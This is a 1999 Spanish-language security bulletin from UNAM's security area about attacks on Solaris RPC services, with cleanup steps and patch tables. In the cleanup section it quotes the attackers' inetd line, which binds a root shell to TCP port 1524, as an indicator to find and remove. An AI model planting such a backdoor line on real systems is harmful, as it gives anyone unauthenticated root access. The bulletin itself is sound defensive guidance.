[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
'Area de Seguridad en C'omputo
DGSCA- UNAM
Boletin de Seguridad 0003- Problemas con servicios RPC e Inetd
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
El 'Area de Seguridad en C'omputo de la Direcci'on General de
Servicios de C'omputo Acad'emico de la UNAM ha recibido en las 'ultimas
semana diversos tipos de indicios de ataques que explotan los servicios
RPC e inetd de diveros sistemas operativos, espec'ificamente Solaris en
todas sus versiones. Dichos reportes nos indican que usan diversos
scripts, lo cual les automatiza la forma de atacar por diversos servicios
remotamente.
Dicha vulnerabilidad ya fue reportada desde Julio 22 de 1999 y
etiquetada como : CERT Incident Note IN-99-04, y que puede ser consultada
directamente en su formato original en la siguiente direcci'on:
http://www.cert.org/incident_notes/IN-99-04.html
Desgraciadamente en los 'ultimos d'ias se ha incrementado la explotaci'on
de 'esta vulnerabilidad en nuestro dominio .mx, con algunas variantes.
Fecha de Detecci'on en M'exico : Agosto 05 1999
'Ultima Revisi'on : Agosto 27 1999
Sistemas Afectados : Solaris en casi todas sus versiones
, , , , , , , , , , , , , , ,
* Descripci'on del Problema *
, , , , , , , , , , , , , , ,
El 'Area de Seguridad en C'omputo ha detectado a ra'iz de incidentes
suscitados a finales del mes de Agosto de 1999 diversos escaneos en
toda la red comprendida en su dominio, proveniendo del exterior y en la
cual las m'aquinas que suelen ser vulnerables son las que son reportadas
con Sistema Operativo Solaris e Irix ( Boletin ASC-0002-99 ) y
con diversas fallas en los servicios rpc.cmsd
http://www.cert.org/advisories/CA-99-08-cmsd.html
Vulnerabilidades en el programa automountd :
http://www.cert.org/advisories/CA-99-05-statd-automountd.html
Vulnerabilidad en el Servicio ToolTalk RPC
http://www.cert.org/advisories/CA-98.11.tooltalk.html
Principalmente es explotado en Sistemas operativos Solaris 2.5.1,
como se detect'o originalmente.
El Problema se origin'o a ra'iz de un incidente de seguridad en el cual
aprovechan dicha vulnerabilidad del automountd, rpc.cmsd y autom'aticamente
crea bajo el subdirectorio /tmp/ un archivo llamado bob que contiene una
l'inea con formato de servicio similar al del inetd.conf en el cual da de
alta el servicio ingreslock y lo deja activo como un proceso en espera de
conexi'on por el puerto TCP 1524.
____________
IMPACTO
____________
El impacto que se tiene es que una vez explotada dicha vulnerabilidad se
puede tener acceso irrestricto como root dentro del equipo desde
cualquier sitio.
Para tratar de disminuir la creciente ola de incidentes el 'Area de
Seguridad en C'omputo de la UNAM recomieda llevar a cabo de forma
inmediata la aplicaci'on de los parches existentes y tomar las medidas
pertinentes para que nuestras m'aquinas no sean afectadas o explotadas y
no registren este tipo de indicios en un futuro.
_________________
SOLUCION TEMPORAL
-----------------
Exiten m'etodos que pueden ser llevados a cabo para poder desactivar el
servicio del ingreslock y es conveniente llevar a cabo estos pasos si tu
m'aquina fue o se encuentra comprometida.
1.- Convertirse en Superusuario (root).
% su -
Password:xxxxxx
2.- Verificar que bajo el directorio /tmp no exista ning'un
archivo llamado bob.
#cd /tmp
#pwd
/tmp
#ls -la bob
3.- Verificar que no existan procesos llamados inetd -s /tmp/bob,
si existen estos, matar los procesos de inmediato (por lo regular
es un proceso con pid grande 2420 por ejemplo).
#ps -fea | grep inetd
root 2150 0.0 0.4 1.93M 256K ?SW 0:00 inetd -s /tmp/bob
root 3170 0.0 0.4 1.93M 256K ?SW 0:00 inetd -s /tmp/bob
#kill -9 2150 3170
4.- Borrar el archivo depositado bajo /tmp llamado bob que
contiene lo siguiente:
#cat bob
ingreslock stream tcp nowait root /bin/sh sh -i
#rm bob
8.- Desactivar bajo /etc/services el servicio de ingreslock,
correspondiente al Puerto TCP 1524
#ingreslock 1524/tcp
9.- Reinicializar el servicio del inetd, en el cual debe de
existir 'unicamente 1 s'olo proceso y con un n'umero de procesos
ID menor a 500.
10.- Revisar si la m'aquina no ha sido comprometida en su
totalidad, nuevas cuentas bajo /etc/passwd por lo general con
directorio de trabajo bajo /tmp.
Si no sabe como realizarlo y sospecha que su sistema ha sido
comprometido por favor revise los siguientes documentos:
http://www.cert.org/tech_tips/root_compromise.html
http://www.cert.org/tech_tips/intruder_detection_checklist.html
Los cuales describen la forma de llevar a cabo esta revisi'on y
que pr'oximamente estar'an en su versi'on en espan~ol en el
'Area de Seguridad en C'omputo de la DGSCA - UNAM
-------
PARCHES
-------
Otra soluci'on es aplicar los parches de seguridad que ya se
encuentran disponibles para tratar de evitar dichas vulnerabilidades en
los servicios rpc.
Los parches los pueden bajar directamente desde su sitio Original para
Solaris localizado en :
http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-
patches
* Vulnerabilidad en Calendar Manager Service Daemon, rpc.cmsd (Solaris)
OpenWindows:
Versi'on SunOS No. de Parche
_____________ _________
SunOS 5.5.1 104976-04
SunOS 5.5.1_x86 105124-03
SunOS 5.5 103251-09
SunOS 5.5_x86 103273-07
SunOS 5.3 101513-14
SunOS 4.1.4 100523-25
SunOS 4.1.3_U1 100523-25
CDE:
Version CDE No. de Parche
___________ ________
1.3 107022-03
1.3_x86 107023-03
1.2 105566-07
1.2_x86 105567-08
* Vulnerabilidad en el rpc.statd (Solaris)
No.Parche Versi'on SunOS
________ __________
106592-02 SunOS 5.6
106593-02 SunOS 5.6_x86
104166-04 SunOS 5.5.1
104167-04 SunOS 5.5.1_x86
103468-04 SunOS 5.5
103469-05 SunOS 5.5_x86
102769-07 SunOS 5.4
102770-07 SunOS 5.4_x86
102932-05 SunOS 5.3
Solaris 2.7 No es vulnerable.
* Vulnerabilidad en automountd:
No.Parche Versi'on SunOS
________ __________
104654-05 SunOS 5.5.1
104655-05 SunOS 5.5.1_x86
103187-43 SunOS 5.5
103188-43 SunOS 5.5_x86
101945-61 SunOS 5.4
101946-54 SunOS 5.4_x86
101318-92 SunOS 5.3
Solaris 2.6 y Solaris 2.7 no son vulnerables.
o Dichos parches pueden ser consultados y bajados de
http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/summary&nav=
patches/pub-patches
ftp://sunsolve.Sun.COM/pub/patches/
________________
INFORMACI'ON
_______________
Para Mayor Informaci'on o Detalles de este bolet'in contactar a:
'Area de Seguridad en C'omputo
DGSCA- UNAM
Tel : 56 22 81 69
Fax : 56 22 80 43
E-Mail : asc en conga super unam mx
http://www.asc.unam.mx/boletines